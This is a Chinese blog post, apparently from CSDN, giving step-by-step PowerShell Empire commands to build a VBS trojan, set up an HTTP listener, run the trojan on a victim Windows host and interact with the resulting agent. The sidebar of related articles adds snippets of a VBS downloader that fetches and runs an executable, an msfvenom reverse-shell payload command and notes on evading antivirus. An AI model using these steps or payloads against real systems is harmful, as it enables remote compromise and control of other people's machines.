使用powershell-empire的windows/launcher_vbs模块生成vbs木马

最新推荐文章于 2024-06-02 21:01:15 发布
最新推荐文章于 2024-06-02 21:01:15 发布
阅读量530 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/124903831
版权

        使用windows/launcher_vbs模块生成vbs木马。

1. 套路

  1. 选择监听模式设置监听

  2. 选择使用stager

  3. 执行execute生成木马

  4. 投到被害主机执行木马

  5. 在powershell-empire上agent交互模式进行操作

2. 渗透过程

2.1 启动powershell-empire server

powershell-empire server

2.2 连接powershell-empire client

powershell-empire client

2.3 设置http监听器

(Empire) > uselistener http
(Empire: uselistener/http) > set Name test1
(Empire: uselistener/http) > set Host 192.168.101.58:8800
(Empire: uselistener/http) > set Port 8800
(Empire: uselistener/http) > execute

备注:

        options可以查看需要做的命令操作,字段有Name,Value,Required,Description。其中,如果Required值为True的话,则为必须设置项。

2.4 生成launcher_vbs木马

usestager windows/launcher_vbs
set Listener test1

        生成的木马放在路径/usr/share/powershell-empire/empire/client/generated-stagers/目录下

2.5 将木马传到windows server 2008 R2上执行

        双击运行launcher.vbs文件即可,运行vbs脚本后即可在powershell-empire server上看到有agent上来

2.6 进入agent验证

agents

interact KVA7TNPB
shell ipconfig

見贤思齊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Meteasploit技术
m0_65332604的博客
04-06 2293
使用Kali操作系统是应注意即使更新源,就像平时及时更新手机APP更新命令如下: apt-get update:只更新软件包的索引源,作用:同步源的软件包的索引信息,从而进行软件更新。 Apt-get upgrade:升级系统上安装的所有软件包,如果失败则保持更新之前的状态。 Apt-get dist-upgrade:升级整个Liunux系统(不仅升级所有已安装的软件包,而且会处理升级过程中可能出现的冲突,在某些情况下,他的部分升级需要人工参与)。 渗透攻击大致步骤: *扫描目标及系统,寻找可用
powershell&bat&vbs三者相互调用.doc
07-18
powershell&bat&vbs三者相互调用.doc
一例H-worm vbs脚本分析
好好学习,天天向上
04-14 715
经过分析,这个样本的主要逻辑如下图所示,这是一个木马,通过U盘传播,感染主机后要定时向后台请求命令执行,通过CC域名可能匹配到该样本属于H-worm家族。用notepad++打开脚本后,发现这是一个混淆后的脚本,主要的代码在anas变量中。参考上面的逻辑编写python脚本对anas变量进行去混淆。详细的分析结果见代码注释。代码中主要的函数功能。
针对cs生成powershell木马免杀火绒
最新发布
WenHeMian_的博客
06-02 328
第二种,Win-PS2EXE,对于ps2exe是打包python专门给win使用的,在其他篇章中会用此来打包python的免杀脚本。心跳0s, byassUac提权成功,但是要谨慎提权!对于函数名和变量名进行混淆,不要用原始名,因为都被人用烂了,360云脑,windows df直接杀。第一种Lodan,玩内网的肯定都很熟悉,这东西其实在cs插件Lodan的目录里面就有LodanGUI。注意我这里是x64的木马,与x86不同的就是代码结构,免杀手法相同。火绒这个东西,只要一开始不报毒,那以后基本很难被杀了。
VBS自动化脚本
为梦奔跑的博客
09-28 722
【代码】VBS自动化脚本。
制作自动运行木马vbs脚本
qt726qt
01-16 719
制作自动运行木马vbs脚本 2010年05月17日   [b]自动下载并运行的VBS脚本代码 转自二进制小组   Set xPost = CreateObject("Microsoft.XMLHTTP")   xPost.Open "GET","http://www.***/muma.exe [/b][b]",0   xPost.Send()   Set sGet = Cr...
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2197
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
06-09
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
PowerShell-Windows-Product-Key-Grab:使用PowerShell模块获取Windows产品密钥
05-18
PowerShell-Windows-产品-密钥-抓取使用PowerShell模块获取Windows产品密钥从Powershell(开始->运行-> powershell.exe) Set-ExecutionPolicy RemoteSigned 导入模块./key.ps1 获取WindowsKey 默认情况下将读取本地...
PowerShell_Restore-BackupDatabaseUsingBakFiles_sqlserver_windows
09-29
`PowerShell`作为Windows操作系统中的强大脚本语言,被广泛用于自动化管理和维护任务,包括SQL Server数据库的备份和恢复。标题“PowerShell_Restore-BackupDatabaseUsingBakFiles_sqlserver_windows”所指向的脚本...
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
Empire生成木马
bring_coco的博客
01-31 686
设置完监听后,就这就要生成木马然后在目标机器上运行,可以把这个理解成Metasploit里面的Payload,Empire里拥有多个模块化的stager,接着输入usestager来设置采用何种模块,输入usestager加空格然后双击Tab键,可以看到一共有33个模块 其中multi为通用模块,osx是Mac操作系统的模块,剩下的就是Windows模块,下面我们挑选其中几种常用类型的木马来具体讲解 1.DLL木马 想要设置DLL木马,首先输入usestager windows/dll的命令,然后输入i
Powershell中调用VBScript
Anders's Blog
11-15 4398
因为VbScript是基于COM的,而Powershell是基于.NET的,所以Powershell可以使用New-Object来建立一个VBScript对象。现在我们开始写个小例子,代码如下:$sc = New-Object -ComObject ScriptControl $sc.Language = "VBScript" $sc.AddCode(' Set obj = CreateObject("WScript.Shell") obj.popup "VBScript Form",,"hello
Windows快捷方式绑马
weixin_30708329的博客
04-14 343
0x01前言 windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,可以加载硬盘上的任意DLL文件,即可执行任意代码。 之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行。 地址:https://github.com/codecrack3/Sho...
Powershell配合word伪装木马执行
洋洋的小黑屋
03-17 366
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ​ 放到VPS上,这里我们放到本机搭建的apache环境中 ​ win7中访问木马是否成功 ​ 打开wo...
使用powershell/vbs自动化模拟鼠标点击操作
weixin_30359021的博客
12-25 1931
今天想做windows上的自动化,所以才有了模拟鼠标点击的需求,先考虑用powershell实现: 首先先安装一个名为“WASP”免费可用的Powershell扩展程序,下载地址:http://wasp.codeplex.com/ 下载解压之后放到C:\Windows\System32\WindowsPowerShell\v1.0\Modules\下,如图: 之后,在开始->运行处...
PowerShell渗透--PowerSploit(WEB安全攻防)
小英雄颂人头
03-03 3146
PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为:github.com/PowerShellMafia/PowerSploit 安装 下载程序目录 git clone https://github.com/PowerShellMafia/PowerSploi...
Powershell免杀
mingyqf的博客
12-14 727
Powershell免杀 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式,一般都为远程下载然后执行的方法,特点就是:直接内存运行,无文件落地。 例如: powershell.exe -nop -w hi
vbs格式编程教程基础
热门推荐
a_8848_z的博客
06-13 1万+
原创vbs代码教学,欢迎来看!
Powershell-批量清理DHCP BAD_ADDRESS地址
06-03
以下是清理DHCP BAD_ADDRESS地址的PowerShell命令: 1. 首先打开PowerShell,并以管理员身份运行。 2. 输入以下命令,以获取所有的BAD_ADDRESS地址。 ``` Get-DhcpServerv4Scope | Get-DhcpServerv4Lease -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值